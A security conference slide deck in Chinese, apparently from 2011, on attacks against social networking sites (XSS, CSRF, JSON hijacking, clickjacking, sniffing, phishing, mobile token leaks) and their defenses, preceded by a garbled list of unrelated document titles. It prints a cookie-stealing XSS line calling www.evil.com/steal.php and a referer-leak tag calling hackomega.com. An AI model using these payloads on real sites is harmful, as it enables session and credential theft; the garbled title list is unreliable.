研 究 部 总 知 道 创 宇 做 这 些 事 : Web 安 全 产 品 的 核 心 技 术 研 发 Web/Web2.0 安 全 研 究 让 互 联 网 更 好 更 安 全 团 队 做 这 些 事 : Web Hacking, 分 享 在 :xeyeteam.apps



Similar documents
I

采 取 行 动 的 机 会 90% 开 拓 成 功 的 道 路 2

何 秋 琳 张 立 春 视 觉 学 习 研 究 进 展 视 觉 注 意 视 觉 感 知


0 年 上 半 年 评 价 与 考 核 细 则 序 号 部 门 要 素 值 考 核 内 容 考 核 方 式 考 核 标 准 考 核 ( 扣 原 因 ) 考 评 得 3 安 全 生 产 目 30 无 同 等 责 任 以 上 道 路 交 通 亡 人 事 故 无 轻 伤 责 任 事 故 无 重 大 质 量

抗 战 时 期 国 民 政 府 的 银 行 监 理 体 制 探 析 % # % % % ) % % # # + #, ) +, % % % % % % % %

马 克 思 主 义 公 正 观 的 基 本 向 度 及 方 法 论 原 则!! # #

修改版-操作手册.doc

,,,,, :,, (.,, );, (, : ), (.., ;. &., ;.. &.., ;, ;, ),,,,,,, ( ) ( ),,,,.,,,,,, : ;, ;,.,,,,, (., : - ),,,, ( ),,,, (, : ),, :,

深圳市新亚电子制程股份有限公司

<433A5C446F63756D656E E E67735C41646D696E F725CD7C0C3E65CC2DBCEC4CFB5CDB3CAB9D3C3D6B8C4CFA3A8BCF2BBAFA3A95CCAB9D3C3D6B8C4CF31302D31392E646F63>

评 委 : 李 炎 斌 - 个 人 技 术 标 资 信 标 初 步 审 查 明 细 表 序 号 投 标 单 位 投 标 函 未 按 招 标 文 件 规 定 填 写 漏 填 或 内 容 填 写 错 误 的 ; 不 同 投 标 人 的 投 标 文 件 由 同 一 台 电 脑 或 同 一 家 投 标 单

评 委 : 徐 岩 宇 - 个 人 技 术 标 资 信 标 初 步 审 查 明 细 表 序 号 投 标 单 位 投 标 函 未 按 招 标 文 件 规 定 填 写 漏 填 或 内 容 填 写 错 误 的 ; 不 同 投 标 人 的 投 标 文 件 由 同 一 台 电 脑 或 同 一 家 投 标 单


中 国 软 科 学 年 第 期!!!

课程类 别

抗 日 战 争 研 究 年 第 期

<4D F736F F D20B9D8D3DAB0BABBAAA3A8C9CFBAA3A3A9D7D4B6AFBBAFB9A4B3CCB9C9B7DDD3D0CFDEB9ABCBBE C4EAC4EAB6C8B9C9B6ABB4F3BBE1B7A8C2C9D2E2BCFBCAE92E646F6378>

说 明 为 了 反 映 教 运 行 的 基 本 状 态, 为 校 和 院 制 定 相 关 政 策 和 进 行 教 建 设 与 改 革 提 供 据 依 据, 校 从 程 资 源 ( 开 类 别 开 量 规 模 ) 教 师 结 构 程 考 核 等 维 度, 对 2015 年 春 季 期 教 运 行 基

目 录 关 于 图 标... 3 登 陆 主 界 面... 3 工 单 管 理... 5 工 单 列 表... 5 搜 索 工 单... 5 工 单 详 情... 6 创 建 工 单... 9 设 备 管 理 巡 检 计 划 查 询 详 情 销 售 管

<4D F736F F D D323630D6D0B9FAD3A6B6D4C6F8BAF2B1E4BBAFB5C4D5FEB2DFD3EBD0D0B6AF C4EAB6C8B1A8B8E6>

¹ º ¹ º 农 业 流 动 人 口 是 指 户 口 性 质 为 农 业 户 口 在 流 入 地 城 市 工 作 生 活 居 住 一 个 月 及 以 上 的 流 动 人 口 非 农 流 动 人 口 是 指 户 口 性 质 为 非 农 户 口 在 流 入 地 城 市 工 作 生 活 居 住 一 个

登录、注册功能的测试用例设计.doc

2. 本 次 修 改 后, 投 资 者 申 购 新 股 的 持 有 市 值 要 求 市 值 计 算 规 则 及 证 券 账 户 使 用 的 相 关 规 定 是 否 发 生 了 变 化? 答 : 未 发 生 变 化 投 资 者 申 购 新 股 的 持 有 市 值 是 指, 以 投 资 者 为 单 位

Microsoft Word - 工业品封面.doc

随着执业中医师资格考试制度的不断完善,本着为我校中医学专业认证服务的目的,本文通过对我校中医类毕业生参加2012年和2013年的中医执业医师考试成绩及通过率、掌握率进行分析,并与全国的平均水平进行差异比较分析,以此了解我校执业中医师考试的现状,进而反映我校中医类课程总体教学水平,发现考核知识模块教学中存在的不足,反馈给相关学院和教学管理部门,以此提高教学和管理水平。

目 录 一 系 统 访 问... 1 二 门 户 首 页 申 报 用 户 审 核 用 户... 2 三 系 统 登 录 用 户 名 密 码 登 录 新 用 户 注 册 用 户 登 录 已 注 册 用

金 不 少 于 800 万 元, 净 资 产 不 少 于 960 万 元 ; (3) 近 五 年 独 立 承 担 过 单 项 合 同 额 不 少 于 1000 万 元 的 智 能 化 工 程 ( 设 计 或 施 工 或 设 计 施 工 一 体 ) 不 少 于 2 项 ; (4) 近 三 年 每 年

3 复 试 如 何 准 备 4 复 试 成 绩 计 算 5 复 试 比 例 6 复 试 类 型 7 怎 么 样 面 对 各 种 复 试 04 05

全国建筑市场注册执业人员不良行为记录认定标准(试行).doc

国债回购交易业务指引

18 上 报 该 学 期 新 生 数 据 至 阳 光 平 台 第 一 学 期 第 四 周 至 第 六 周 19 督 促 学 习 中 心 提 交 新 增 专 业 申 请 第 一 学 期 第 四 周 至 第 八 周 20 编 制 全 国 网 络 统 考 十 二 月 批 次 考 前 模 拟 题 第 一 学

3 月 30 日 在 中 国 证 券 报 上 海 证 券 报 证 券 时 报 证 券 日 报 和 上 海 证 券 交 易 所 网 站 上 发 出 召 开 本 次 股 东 大 会 公 告, 该 公 告 中 载 明 了 召 开 股 东 大 会 的 日 期 网 络 投 票 的 方 式 时 间 以 及 审

第 四 条 建 设 单 位 对 可 能 产 生 职 业 病 危 害 的 建 设 项 目, 应 当 依 照 本 办 法 向 安 全 生 产 监 督 管 理 部 门 申 请 职 业 卫 生 三 同 时 的 备 案 审 核 审 查 和 竣 工 验 收 建 设 项 目 职 业 卫 生 三 同 时 工 作 可

ICS 35

金融全渠道银行彩页中文版0702

 编号:

徐天宏:《基因天堂》.doc

一 公 共 卫 生 硕 士 专 业 学 位 论 文 的 概 述 学 位 论 文 是 对 研 究 生 进 行 科 学 研 究 或 承 担 专 门 技 术 工 作 的 全 面 训 练, 是 培 养 研 究 生 创 新 能 力, 综 合 运 用 所 学 知 识 发 现 问 题, 分 析 问 题 和 解 决

4 进 入 交 互 区 设 置 的 组 件 管 理, 在 组 件 管 理 中, 教 师 可 以 选 择 课 程 空 间 中 的 所 有 组 件, 并 通 过 点 击 启 用 或 不 启 用 选 定 组 件 在 课 程 空 间 中 的 显 示 5 进 入 工 作 室 管 理 的 工 作 室 首 页,

包 头 北 方 创 业 股 份 有 限 公 司 2016 年 第 二 次 临 时 股 东 大 会 会 议 须 知 为 维 护 股 东 合 法 权 益, 确 保 包 头 北 方 创 业 股 份 有 限 公 司 ( 以 下 简 称 公 司 )2016 年 第 二 次 临 时 股 东 大 会 ( 以 下

新, 各 地 各 部 门 ( 单 位 ) 各 文 化 事 业 单 位 要 高 度 重 视, 切 实 加 强 领 导, 精 心 组 织 实 施 要 根 据 事 业 单 位 岗 位 设 置 管 理 的 规 定 和 要 求, 在 深 入 调 查 研 究 广 泛 听 取 意 见 的 基 础 上, 研 究 提

年 8 月 11 日, 公 司 召 开 2015 年 第 五 次 临 时 股 东 大 会, 审 议 通 过 了 关 于 公 司 <2015 年 股 票 期 权 激 励 计 划 ( 草 案 )> 及 其 摘 要 的 议 案 关 于 提 请 股 东 大 会 授 权 董 事 会 办 理 公

珠江钢琴股东大会

白皮书

Microsoft Word - 第7章 图表反转形态.doc

目 录 第 一 章 博 星 卓 越 电 子 商 务 营 销 策 划 实 践 平 台 硬 件 使 用 介 绍... 3 第 二 章 博 星 卓 越 电 子 商 务 营 销 策 划 实 践 平 台 管 理 员 端 功 能 使 用 介 绍 系 统 管 理 员 登 陆 班

现 场 会 议 时 间 为 :2016 年 5 月 19 日 网 络 投 票 时 间 为 :2016 年 5 月 18 日 年 5 月 19 日 其 中 通 过 深 圳 证 券 交 易 所 交 易 系 统 进 行 网 络 投 票 的 时 间 为 2016 年 5 月 19 日 9:30-

光明乳业股份有限公司

·岗位设置管理流程

2016年南开大学MBA招生信息


龚 亚 夫 在 重 新 思 考 基 础 教 育 英 语 教 学 的 理 念 一 文 中 援 引 的 观 点 认 为 当 跳 出 本 族 语 主 义 的 思 维 定 式 后 需 要 重 新 思 考 许 多 相 连 带 的 问 题 比 如 许 多 发 音 的 细 微 区 别 并 不 影 响 理 解 和

附件1:

B-002 行 政 处 罚 在 气 象 探 测 环 境 保 护 范 围 内 从 事 危 害 气 象 探 测 环 境 活 动 的 处 罚 中 华 人 民 共 和 国 气 象 法 第 三 十 五 条 第 一 款 第 二 项 B-003 行 政 处 罚 在

一 开 放 性 的 政 策 与 法 规 二 两 岸 共 同 的 文 化 传 承 三 两 岸 高 校 各 自 具 有 专 业 优 势 远 见 杂 志 年 月 日

全国教师资格认定管理信息系统

2.5 选 举 陈 晓 非 女 士 为 第 六 届 董 事 会 董 事 候 选 人 的 议 案 ; 2.6 选 举 卢 婕 女 士 为 第 六 届 董 事 会 董 事 候 选 人 的 议 案 ; 2.7 选 举 张 文 君 先 生 为 第 六 届 董 事 会 独 立 董 事 候 选 人 的 议 案


第 期 李 伟 等 用 方 法 对 中 国 历 史 气 温 数 据 插 值 可 行 性 讨 论

2014年中央财经大学研究生招生录取工作简报

( 二 ) 现 行 统 一 高 考 制 度 不 利 于 培 养 人 的 创 新 精 神,,,,,,,,,,,,, [ ],,,,,,,,,,, :, ;,,,,,,? ( 三 ) 现 行 统 一 高 考 制 度 不 利 于 全 体 学 生 都 获 得 全 面 发 展,, [ ],,,,,,,,,,,

2006年顺德区高中阶段学校招生录取分数线

<4D F736F F D20B9D8D3DA BDECB1CFD2B5C9FAC5C9C7B2B1A8B5BDB5C8D3D0B9D8B9A4D7F7B5C4CDA8D6AAA3A E362E38A3A92E646F63>

国 际 中 国 研 究 动 态 是 中 国 社 会 科 学 院 国 际 中 国 学 研 究 中 心 出 品 的 以 介 绍 国 际 中 国 问 题 研 究 最 新 成 果 为 宗 旨 的 电 子 杂 志 计 划 每 月 出 版 一 期 除 编 译 和 摘 编 网 络 和 中 外 期 刊 库 上 可

Cybozu Garoon 3 管理员手册

Your Child is Myopic

Microsoft Word - 文件汇编.doc

抗 日 战 争 研 究 % 年 第 期! # # % %

自 服 务 按 钮 无 法 访 问 新 系 统 的 自 服 务 页 面 因 此 建 议 用 户 从 信 网 中 心 ( 主 页, 右 下 角 位 置 的 常 用 下 载, 或 校 园 网 用 户 自 服 务 ( 首 页

<433A5C C6B73625C B746F705CB9FABCCAD6D0D2BDD2A9D7A8D2B5B8DFBCB6BCBCCAF5D6B0B3C6C6C0C9F3C9EAC7EBD6B8C4CFA3A CDA8D3C3B0E6A3A92E646F63>

( ) 信 号 与 系 统 Ⅰ 学 科 基 础 必 修 课 教 周 2016 年 06 月 13 日 (08:00-09:35) ( )

操作手册

三武一宗灭佛研究

!!!!!

中 日 信 息 化 的 比 较 与 合 作 一 中 日 信 息 化 的 规 模 比 较

微软用户

!!!!!!!!!!

办 法 >( 修 订 稿 ) 的 议 案 关 于 提 请 任 子 行 网 络 技 术 股 份 有 限 公 司 股 东 大 会 授 权 董 事 会 办 理 公 司 限 制 性 股 票 激 励 计 划 相 关 事 宜 的 议 案 确 定 公 司 的 限 制 性 股 票 激 励 计 划 相 关 事 项 如

中 国 社 会 科 学 年 第 期!!!! ( ( ) % ) ) ) % % % %

系统设计文档_样稿管理模块 V1.1_.doc

《C语言基础入门》课程教学大纲

2016 年 荔 湾 区 财 政 核 定 支 出 汇 总 表 表 二 单 位 名 称 : 广 州 文 化 公 园 基 本 支 出 项 目 支 出 科 目 编 码 预 算 科 目 名 称 一 般 公 共 预 算 5, , , , ,

上海证券交易所会议纪要

一、资质申请

第2章 数据类型、常量与变量

上证指数


黄 金 原 油 总 持 仓 增 长, 同 比 增 幅 分 别 为 4.2% 和 4.1% 而 铜 白 银 以 及 玉 米 则 出 现 减 持, 减 持 同 比 减 少 分 别 为 9.4%,9.4% 以 及 6.5% 大 豆, 豆 粕 结 束 连 续 4 周 总 持 仓 量 增 长, 出 现 小 幅

doc

2008 年 金 融 危 机 爆 发, 我 们 发 现 世 界 主 要 国 家 都 在 做 一 件 事 情, 就 是 计 划 靠 制 造 业 拉 动 整 个 经 济 的 复 苏, 这 个 大 家 是 有 目 共 睹 的 制 造 业 在 中 国 来 说 也 是 拉 动 经 济 增 长 非 常 关 键

标题

第 六 章 债 券 股 票 价 值 评 估 1 考 点 一 : 债 券 价 值 的 影 响 因 素 2

境 外 上 市 外 资 股 股 东 持 有 股 份 总 数 (H 股 ) 489,157,907 3 出 席 会 议 的 股 东 所 持 有 表 决 权 股 份 数 占 公 司 有 表 决 权 股 份 总 数 的 其 中 :A 股 股 东 持 股 占 股 份 总 数 的


中 中 中 中 部 中 岗 位 条 件 历 其 它 历 史 师 地 理 师 生 物 师 体 与 健 康 师 从 事 中 历 史 工 从 事 中 地 理 工 从 事 中 生 物 工 从 事 中 体 与 健 康 工 2. 课 程 与 论 ( 历 史 ); 2. 科 ( 历 史 )

第 一 部 分 MagiCAD for Revit 安 装 流 程

世华财讯模拟操作手册

证券代码: 证券简称:长城电脑 公告编号:


Transcription:

# Author: 余 弦 # Date: 2011/08/10 # Email: evilcos@gmail.com

研 究 部 总 监 @ 知 道 创 宇 做 这 些 事 : Web 安 全 产 品 的 核 心 技 术 研 发 Web/Web2.0 安 全 研 究 让 互 联 网 更 好 更 安 全 ROOT@XEYE 团 队 做 这 些 事 : Web Hacking, 分 享 在 :xeyeteam.appspot.com Hacking no area

2010/7: 邪 恶 的 SNS 攻 击 与 防 御 @HKITSSM 一 年 来 新 事 物 的 兴 起, 速 度 在 变 快, 安 全 赶 上 了 吗?!!! 2011 什 么 在 流 行?

一 理 解 SNS 二 攻 防 我 们 进 入 了 一 个 新 战 场 我 们 做 了 很 多 深 入 的 研 究, 还 在 持 续 三 愈 演 愈 烈 的 战 争 还 有 什 么 等 着 我 们 四 Q&A

Social Networking Services 社 交 网 络 : 社 会 交 往 的 虚 拟 化 这 里 说 的 SNS 包 含 那 些 具 有 SNS 性 质 的 网 站

Web2.0 技 术 与 模 式 AJAX/DHTML/mashup 混 搭 /HTML5/... 更 好 的 体 验, 更 轻 松 的 交 互 用 户 高 度 参 与 隐 私 大 量 的 隐 私 数 据 与 社 交 关 系 关 注 隐 私 控 制 策 略 社 会 关 系 虚 拟 化

信 任 关 系 Web 层 面 浏 览 器 的 同 源 策 略 嵌 入 的 第 三 方 内 容 安 全 性 用 户 层 面 依 赖 于 用 户 判 断, 可 广 大 用 户 会 判 断 吗?... 隐 私 数 据 用 户 的 身 份 认 证 password, cookies, 认 证 token DOM 页 面 里 的 隐 私 内 容 来 自 数 据 库 等

1. 隐 私 控 制 策 略 不 完 备 2. XSS 跨 站 脚 本 攻 击 3. CSRF 跨 站 请 求 伪 造 4. 点 击 劫 持 风 险 5. HTTP 明 文, 局 域 网 抓 包 6. 高 级 钓 鱼 技 术 7. 移 动 手 机 上 的 Web 安 全

泄 露 了 什 么 真 实 世 界 里 的 地 理 位 置 好 友 关 系 其 它 头 像 照 片 ( 可 能 是 真 人 ), 统 计 信 息 等 这 意 味 着

如 果 泄 露 个 人 基 本 信 息 对 于 黑 客 来 说 可 以 挖 掘 出 更 多 search engine other databases! 如 果 泄 露 了 好 友 关 系 对 于 黑 客 来 说 你 已 经 没 隐 私 了 黑 了 你 好 友 的 任 意 一 位 假 冒 你 的 好 友 SNS 里 的 社 会 工 程 学

业 务 与 安 全 的 矛 盾 为 什 么 隐 私 控 制 不 能 更 严 格 为 什 么 要 开 放 好 友 关 系 隐 私 控 制 策 略 不 应 该 偷 偷 进 行 隐 私 控 制 需 要 全 面 隐 私 控 制 也 需 要 用 户 体 验

Web 客 户 端 逻 辑 主 要 是 JavaScript ActionScript(Flash/Flex) 一 旦 出 现 XSS 注 入 恶 意 的 JavaScript 到 当 前 页 面 等 于 完 全 控 制 了 Web 客 户 端 逻 辑 等 于 任 何 隐 私 都 不 再 是 隐 私 因 为 黑 客 可 以 轻 易 盗 走 它 们 用 户 的 身 份 认 证 页 面 的 隐 私 内 容

盗 用 户 隐 私 数 据 XSS exploit 获 取 cookies new Image().src='http://www.evil.com/steal.php?data='+encodeU RIComponent(document.cookie); DOM 操 作 获 取 更 多 隐 私 数 据 document.getelementbyid('token').value;... 还 有 更 多 的 攻 击 手 法 获 取 明 文 密 码 XSS 蠕 虫 攻 击 : 新 浪 微 博 蠕 虫

原 理 : 这 些 最 新 版 本 的 浏 览 器 会 在 用 户 登 录 时 提 醒 记 录 密 码 Firefox/Chrome/IE/Opera/Safari( 默 认 不 保 存 ) 等

原 理 : XSS 可 以 这 样 获 取 到 明 文 密 码 :

more: http://xeyeteam.appspot.com/2010/12/24/xss_ste al_plain_password.html 由 于 浏 览 器 差 异, 更 多 细 节, 更 完 整 的 POC 会 单 独 发 文 公 布

一 切 输 入 都 不 可 信 进 入 数 据 库 进 入 文 件 系 统 进 入 操 作 系 统 进 入 模 块 类 甚 至 是 函 数 输 入 验 证 输 出 编 码 白 名 单 机 制 黑 名 单 机 制

cookie security [path][expires][domain][secure][httponly] 客 户 端 脚 本 无 法 获 取 到 HttpOnlycookie 仅 仅 保 护 身 份 认 证 不 被 盗 用

断 其 源 头 修 补 XSS, CSRF 等 漏 洞 业 务 逻 辑 分 离 不 同 的 业 务 逻 辑 不 应 该 在 同 一 域 下 xeyetem.appspot.com 优 于 appspot.com/xeyeteam 关 键 功 能 使 用 验 证 码 或 密 码 二 次 认 证 防 止 短 时 间 内 多 次 提 交 worm 经 常 大 批 量 post 数 据 完 善 的 用 户 举 报 与 日 志 功 能 SNS 就 是 基 于 用 户 的 日 志 辅 助 定 位 问 题 所 在

注 : 对 于 本 地 cookie,ie 下, 目 标 网 站 需 响 应 P3P 头, 才 能 成 功 进 行 CSRF 正 常 的 请 求 目 标 站 点 ( 存 在 CSRF 漏 洞 ) 伪 造 的 请 求 可 信 任 的 请 求 带 上 内 存 cookie 或 本 地 cookie 可 信 任 的 请 求 带 上 内 存 cookie 或 本 地 cookie 浏 览 器 被 攻 击 者 恶 意 站 点

能 做 许 多 事 Flash 跨 域 发 起 伪 造 的 请 求 如 果 要 获 取 数 据, 则 基 于 网 站 根 目 录 下 的 crossdomain.xml 如 果 仅 仅 是 发 起 请 求, 只 要 目 标 网 站 没 防 御 CSRF, 那 就 随 意 进 行, 而 且 很 隐 蔽 :) JSON/JS 劫 持 可 以 获 取 很 多 隐 私 数 据, 因 为 网 站 们 很 喜 欢 用 它 们 来 做 数 据 传 输 格 式 普 通 CSRF 攻 击 发 起 请 求 对 目 标 网 站 进 行 数 据 篡 改 (URL GET/ 表 单 提 交 ) 也 能 发 起 CSRF 蠕 虫 攻 击...

crossdomain.xml flash 的 跨 域 通 信 配 置 文 件 如 果 这 样 配 置 黑 客 构 造 恶 意 的 swf 文 件 用 户 登 录 qun.qq.com 后, 并 浏 览 了 这 个 swf swf 可 以 盗 取 用 户 页 面 的 隐 私 数 据 了 这 个 已 经 修 补

swfsteal:

配 置 好 crossdomain.xml

某 微 博 : http://t.xx.com/ajaxlogin.php?framelogin=0&callback=fun c 未 登 录 时 返 回 数 据 func({"result":false,"errno":"","reason":""}); 登 录 时 返 回 数 据 func({"result":true,"userinfo":{"uniqueid":"1652595727","userid":"evilcos@gm ail.com","displayname":null,"userdomain":"evilcos"}} 通 过 这 个 可 以 判 断 用 户 是 否 登 录 :) callback 参 数 值 可 自 定 义, 返 回 数 据 是 JS 内 容 格 式 如 :func(json_data) 那 么 我 们 可 以 劫 持 住 这 个 func, 执 行 func 后, 得 到 的 参 数 值 就 是 这 个 JSON_DATA 这 样 来 攻 击

攻 击 页 面 的 代 码 效 果 如 下

无 效 防 御 返 回 数 据 类 型 Content-Type 改 为 application/json 等 被 <script src= 调 用 时, 同 样 解 析 为 js 文 件 有 效 防 御 我 也 不 很 清 楚 :(, 欢 迎 讨 论 如 果 不 需 要 callback 就 可 以 去 掉 新 一 代 的 浏 览 器 已 经 不 允 许 直 接 对 JSON 对 象 进 行 劫 持 但, 也 许 有 有 效 的 绕 过 方 法 尽 可 能 不 要 将 这 些 隐 私 内 容 放 在 JSON 中...

加 Referer, 请 求 源 判 断 无 法 防 御 站 内 发 起 的 伪 造 请 求 加 token Form/AJAX 中 每 次 维 护 一 个 唯 一 token 值, 无 法 预 测 有 可 能 泄 露 JSON 数 据 泄 露 RefererURL 中 泄 露 XSS 脚 本 可 以 获 取 到 这 个 token HTML5 里 的 拖 放 劫 持 攻 击, 可 以 得 到 这 个 token:)... 加 验 证 码 最 保 险, 可 用 户 体 验 太 差 了

界 面 伪 装 (UI Redress) 的 一 种 点 击 目 标 对 象 时 ( 比 如 按 钮 链 接 等 ), 点 击 事 件 (onclick) 其 实 并 没 在 该 目 标 对 象 上 触 发, 而 是 在 一 个 看 不 见 ( 透 明 ) 的 对 象 上 触 发 可 以 执 行 删 除 操 作 传 播 蠕 虫 操 作... 黑 客 进 入 美 工 猥 琐 时 代 图 来 自 : Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites

Heart(xeyeteam) 和 我 发 现 一 种 普 遍 的 点 击 劫 持 蠕 虫 现 象 涵 盖 国 内 各 大 微 博 SNS 社 区 等, 同 样 影 响 Google Reader 等 Google 服 务 通 过 该 蠕 虫 至 少 能 传 播 恶 意 网 站 与 舆 情 信 息 更 浓 厚 的 社 工 成 分 在 里 面 来 看 过 程 截 图 漏 洞 位 置 不 方 便 公 开 Google 修 补 很 头 疼, 给 我 们 的 答 复 一 直 是 这 样 会 影 响 到 正 常 业 务, 恩, 头 疼

响 应 X-Frame-Options 头 PHP: header ("X-Frame-Options: DENY"); Frame Busting 脚 本 方 式 <style> html {display:none;} </style> <script> if(self==top){ document.documentelement.style.display='block'; }else{ top.location=self.location; } </script> 目 的 都 是 让 目 标 页 面 不 能 被 iframe 嵌 入

数 据 在 http 上 明 文 传 输 login data: username/password cookies 页 面 内 容 wifi 安 全 无 线 热 点 很 多 无 线 可 入 侵 :WEP, WPA, etc 无 线 可 钓 鱼 :Phishing AP, etc wireless lan sniffing

全 站 https 会 牺 牲 性 能 Gmail, Google Reader, QQ mail, etc login on https! password modify on https! cookie on ssl [path][expires][domain][secure][httponly]

传 统 钓 鱼 一 个 分 工 明 确 的 地 下 产 业 链 我 们 对 这 个 有 很 深 的 研 究 技 术 点 URL 重 定 向 XSS 相 似 域 名 相 似 UI... 高 级 钓 鱼 基 于 DHTML

原 生 态 的 攻 击 demo: steal password on hi.baidu.com

防 御 将 会 很 困 难 上 升 到 人 与 人 的 较 量 层 面 首 先 修 补 漏 洞 XSS, etc 完 善 的 举 报 功 能 总 有 些 用 户 会 参 与 举 报 即 时 的 公 告 提 醒 让 你 的 用 户 知 道 发 生 了 什 么 让 他 们 觉 得 你 重 视 用 户 隐 私

众 多 浏 览 器 Opera mini, Safari, IE, UCWEB, QQ, etc 页 面 渲 染 WML(WMLScript), HTML(JavaScript), etc 身 份 认 证 cookie url authentication token 其 它 是 否 支 持 flash 是 否 支 持 离 线 存 储 localstorage, local Database

危 险 的 身 份 认 证 方 式 url authentication token 每 次 登 录 生 成 一 个 唯 一 的 不 可 预 测 的 authentication token token 附 加 在 每 个 url 里 如 何 盗 取 用 户 身 份 认 证? referer eg: <img src=http://hackomega.com/steal.php/>

使 用 更 安 全 的 认 证 方 式 cookie 缺 点 : 有 些 手 机 浏 览 器 不 支 持 cookie 否 则 过 滤 吧, 一 切 可 以 带 出 referer 的 对 象 html tags: img/iframe/a/area/ css styles: background:url()/@import/moz-binding/

更 脆 弱 XSS/CSRF 等 开 始 大 量 出 现 更 简 单 的 HTTP 请 求 响 应 逻 辑 认 证 简 单 了 授 权 简 单 了 没 验 证 码 了 木 桶 原 理 里 的 那 块 短 板, 溢 出 吧 安 全...

SNS 攻 击 会 是 一 种 趋 势 很 多 有 价 值 的 数 据 为 什 么 要 攻 击 不 会 总 是 娱 乐 娱 乐 利 益 驱 动 都 有 谁 参 与 了 防 御 网 站 浏 览 器 wars 用 户 法 律

我 们 也 尽 了 一 份 力 我 们 有 近 1000W 网 站 的 数 据 中 心 让 我 们 从 全 局 角 度 上 去 统 计 分 析 这 个 Web 世 界 的 健 康 状 态 我 们 有 统 一 网 站 安 全 监 测 平 台 WebSOC 我 们 有 SAAS 网 站 安 全 监 测 服 务 scanv.com 我 们 有 云 防 火 墙 cloudwaf.com 我 们 有 专 门 针 对 Web/Web2.0 的 研 究 团 队 逐 渐 挖 掘 出 更 多 有 意 思 的 数 据 我 们 有 这 样 的 决 心, 我 们 在 持 续 产 出 与 分 享...

这 是 一 个 令 人 激 动 的 新 武 器 新 的 HTML5 标 签 元 素 新 的 JS APIs 更 强 大 的 CSS 样 式 HTML5 让 这 个 SNS 更 加 精 彩 :) 你 想 到 了 吗?

Q&A 2012? 我 们 期 待 着